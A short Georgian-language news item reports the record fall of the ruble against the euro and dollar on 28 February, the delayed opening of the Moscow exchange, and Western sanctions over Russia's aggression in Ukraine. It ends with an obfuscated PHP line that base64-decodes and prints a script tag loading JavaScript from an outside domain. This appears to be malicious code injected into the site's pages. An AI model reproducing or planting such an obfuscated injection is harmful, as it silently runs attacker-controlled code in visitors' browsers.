celsiusi
ავერსი საქკაბელი
Bloomberg-ის მონაცემებით, 28 თებერვალს დილით საერთაშორისო ვაჭრობაში ევროს და დოლარის კურსმა ისტორიულ მაქსიმუმს მიაღწია.
 
მოსკოვის დროით 07:10 საათზე ევროს ფასი 123.47 რუბლი იყო, დოლარის კი 107.68. ამასთან პიკის დროს ევროს ფასმა 132 რუბლამდე, დოლარმა კი177 რუბლამდე აიწია.
 
მოსკოვის ბირჟაზე ვაჭრობის დაწყება ცენტრალური ბანკის გადაწყვეტილებით  ჯერ მოსკოვის დროით 10:00 საათამდე გადაიდო. შემდეგ კი ცნობილი გახდა, რომ მოსკოვის საფონდო ბირჟაზე ვაჭრობა 15:00 საათზე ადრე არ გაიხსნება, გახსნაზე გადაწყვეტილებას ცენტრალური ბანკი 13:00 საათამდე მიიღებს.
 
შეგახსენებთ, დასავლეთის ქვეყნებმა მოსკოვს მასშტაბური სანქციები დაუწესეს უკრაინაში განხორციელებული სამხედრო აგრესიის გამო.  კერძოდ, ევროკავშირმა განაცხადა რომ რუსული ბანკების ნაწილი SWIFT-დან გაითიშება, ასევე გაიყინება ცენტრალური ბანკის აქტივები.
 
ევროკავშირმა ასევე აკრძალა რუსული სახელმწიფო კომპანიების ფასიანი ქაღალდების საკუთარ ბირჟებზე განთავსება და შეუზღუდა ვალის მოზიდვა ევროში.
 
 
1007
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");